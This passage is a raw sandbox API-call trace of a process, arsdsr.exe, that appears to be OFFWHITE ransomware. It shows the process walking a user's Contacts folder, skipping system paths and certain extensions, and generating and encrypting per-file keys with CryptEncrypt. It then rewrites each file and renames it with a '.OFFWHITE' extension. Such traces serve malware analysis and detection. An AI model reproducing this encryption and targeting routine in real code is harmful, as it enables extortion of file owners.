(lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.789] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.789] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0131.789] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.789] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.789] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0131.789] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.789] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.789] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0131.789] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.789] SetLastError (dwErrCode=0x0) [0131.789] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.791] GetLastError () returned 0x0 [0131.791] GetLastError () returned 0x0 [0131.791] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10c1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.791] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.791] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10d1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.791] WriteFile (in: hFile=0xb0, lpBuffer=0x547e08*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547e08*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0131.791] GetProcessHeap () returned 0x500000 [0131.791] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10b1e) returned 0x5557b0 [0131.792] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.792] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x10b1e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x10b1e, lpOverlapped=0x0) returned 1 [0131.797] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.797] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x10b1e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x10b1e, lpOverlapped=0x0) returned 1 [0131.797] GetProcessHeap () returned 0x500000 [0131.797] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0131.797] CloseHandle (hObject=0xb0) returned 1 [0131.800] GetProcessHeap () returned 0x500000 [0131.800] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0131.800] GetProcessHeap () returned 0x500000 [0131.800] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0131.800] GetProcessHeap () returned 0x500000 [0131.801] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0131.801] GetProcessHeap () returned 0x500000 [0131.801] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0131.801] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" [0131.801] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.OFFWHITE" [0131.801] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.offwhite")) returned 1 [0131.801] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0131.801] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2=".") returned 1 [0131.801] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="..") returned 1 [0131.801] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="...") returned 1 [0131.801] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="windows") returned -1 [0131.801] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="$recycle.bin") returned 1 [0131.801] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="rsa") returned -1 [0131.801] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="ntuser.dat") returned -1 [0131.802] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="programdata") returned -1 [0131.802] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="appdata") returned 1 [0131.802] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="program files") returned -1 [0131.802] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="program files (x86)") returned -1 [0131.802] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0131.802] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="asdlfk poopvy.contact" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" [0131.802] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.802] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.802] PathFindExtensionW (pszPath="asdlfk poopvy.contact") returned=".contact" [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".exe") returned -1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".log") returned -1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".cab") returned 1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".cmd") returned 1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".com") returned 1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".cpl") returned -1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".ini") returned -1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".dll") returned -1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".url") returned -1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".ttf") returned -1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".mp3") returned -1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".pif") returned -1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".mp4") returned -1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".OFFWHITE") returned -1 [0131.802] lstrcmpiW (lpString1=".contact", lpString2=".msi") returned -1 [0131.802] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0131.802] GetProcessHeap () returned 0x500000 [0131.802] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547e18 [0131.802] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0131.803] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1171) returned 1 [0131.803] GetProcessHeap () returned 0x500000 [0131.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0131.803] GetProcessHeap () returned 0x500000 [0131.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0131.803] GetProcessHeap () returned 0x500000 [0131.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0131.803] GetProcessHeap () returned 0x500000 [0131.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0131.803] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.803] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.803] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0131.803] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.803] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.803] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0131.803] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.803] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.803] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0131.803] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.803] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.803] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0131.804] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x493, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.804] SetLastError (dwErrCode=0x0) [0131.804] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.809] GetLastError () returned 0x0 [0131.810] GetLastError () returned 0x0 [0131.810] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x593, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.810] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.810] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x693, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.810] WriteFile (in: hFile=0xb0, lpBuffer=0x547e18*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547e18*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0131.810] GetProcessHeap () returned 0x500000 [0131.810] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x493) returned 0x53f480 [0131.810] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.810] ReadFile (in: hFile=0xb0, lpBuffer=0x53f480, nNumberOfBytesToRead=0x493, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesRead=0x295e540*=0x493, lpOverlapped=0x0) returned 1 [0131.810] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.810] WriteFile (in: hFile=0xb0, lpBuffer=0x53f480*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesWritten=0x295e54c*=0x493, lpOverlapped=0x0) returned 1 [0131.810] GetProcessHeap () returned 0x500000 [0131.810] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53f480 | out: hHeap=0x500000) returned 1 [0131.810] CloseHandle (hObject=0xb0) returned 1 [0131.816] GetProcessHeap () returned 0x500000 [0131.816] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0131.816] GetProcessHeap () returned 0x500000 [0131.816] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0131.817] GetProcessHeap () returned 0x500000 [0131.817] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0131.817] GetProcessHeap () returned 0x500000 [0131.817] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0131.817] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" [0131.817] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.OFFWHITE" [0131.817] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.offwhite")) returned 1 [0131.819] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0131.819] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2=".") returned 1 [0131.819] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="..") returned 1 [0131.819] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="...") returned 1 [0131.819] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="windows") returned -1 [0131.819] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="$recycle.bin") returned 1 [0131.819] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="rsa") returned -1 [0131.819] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="ntuser.dat") returned -1 [0131.819] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="programdata") returned -1 [0131.819] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="appdata") returned 1 [0131.819] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="program files") returned -1 [0131.819] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="program files (x86)") returned -1 [0131.819] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0131.819] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="chucu jadnvk.contact" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" [0131.819] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.819] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.819] PathFindExtensionW (pszPath="chucu jadnvk.contact") returned=".contact" [0131.819] lstrcmpiW (lpString1=".contact", lpString2=".exe") returned -1 [0131.819] lstrcmpiW (lpString1=".contact", lpString2=".log") returned -1 [0131.819] lstrcmpiW (lpString1=".contact", lpString2=".cab") returned 1 [0131.819] lstrcmpiW (lpString1=".contact", lpString2=".cmd") returned 1 [0131.819] lstrcmpiW (lpString1=".contact", lpString2=".com") returned 1 [0131.819] lstrcmpiW (lpString1=".contact", lpString2=".cpl") returned -1 [0131.819] lstrcmpiW (lpString1=".contact", lpString2=".ini") returned -1 [0131.819] lstrcmpiW (lpString1=".contact", lpString2=".dll") returned -1 [0131.819] lstrcmpiW (lpString1=".contact", lpString2=".url") returned -1 [0131.819] lstrcmpiW (lpString1=".contact", lpString2=".ttf") returned -1 [0131.819] lstrcmpiW (lpString1=".contact", lpString2=".mp3") returned -1 [0131.820] lstrcmpiW (lpString1=".contact", lpString2=".pif") returned -1 [0131.820] lstrcmpiW (lpString1=".contact", lpString2=".mp4") returned -1 [0131.820] lstrcmpiW (lpString1=".contact", lpString2=".OFFWHITE") returned -1 [0131.820] lstrcmpiW (lpString1=".contact", lpString2=".msi") returned -1 [0131.820] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0131.820] GetProcessHeap () returned 0x500000 [0131.820] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547e28 [0131.820] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0131.821] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1177) returned 1 [0131.821] GetProcessHeap () returned 0x500000 [0131.821] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0131.821] GetProcessHeap () returned 0x500000 [0131.821] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0131.821] GetProcessHeap () returned 0x500000 [0131.821] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0131.821] GetProcessHeap () returned 0x500000 [0131.821] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0131.821] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.821] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.821] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0131.821] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.821] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.821] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0131.821] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.821] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.821] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0131.822] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.822] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.822] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0131.822] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x499, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.822] SetLastError (dwErrCode=0x0) [0131.822] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.824] GetLastError () returned 0x0 [0131.824] GetLastError () returned 0x0 [0131.824] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x599, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.824] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.824] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x699, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.824] WriteFile (in: hFile=0xb0, lpBuffer=0x547e28*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547e28*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0131.824] GetProcessHeap () returned 0x500000 [0131.824] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x499) returned 0x53f480 [0131.824] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.824] ReadFile (in: hFile=0xb0, lpBuffer=0x53f480, nNumberOfBytesToRead=0x499, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesRead=0x295e540*=0x499, lpOverlapped=0x0) returned 1 [0131.824] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.824] WriteFile (in: hFile=0xb0, lpBuffer=0x53f480*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesWritten=0x295e54c*=0x499, lpOverlapped=0x0) returned 1 [0131.824] GetProcessHeap () returned 0x500000 [0131.824] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53f480 | out: hHeap=0x500000) returned 1 [0131.824] CloseHandle (hObject=0xb0) returned 1 [0131.830] GetProcessHeap () returned 0x500000 [0131.830] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0131.830] GetProcessHeap () returned 0x500000 [0131.830] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0131.830] GetProcessHeap () returned 0x500000 [0131.830] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0131.830] GetProcessHeap () returned 0x500000 [0131.830] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0131.830] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" [0131.830] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.OFFWHITE" [0131.830] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.offwhite")) returned 1 [0131.831] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.831] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0131.831] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0131.831] lstrcmpiW 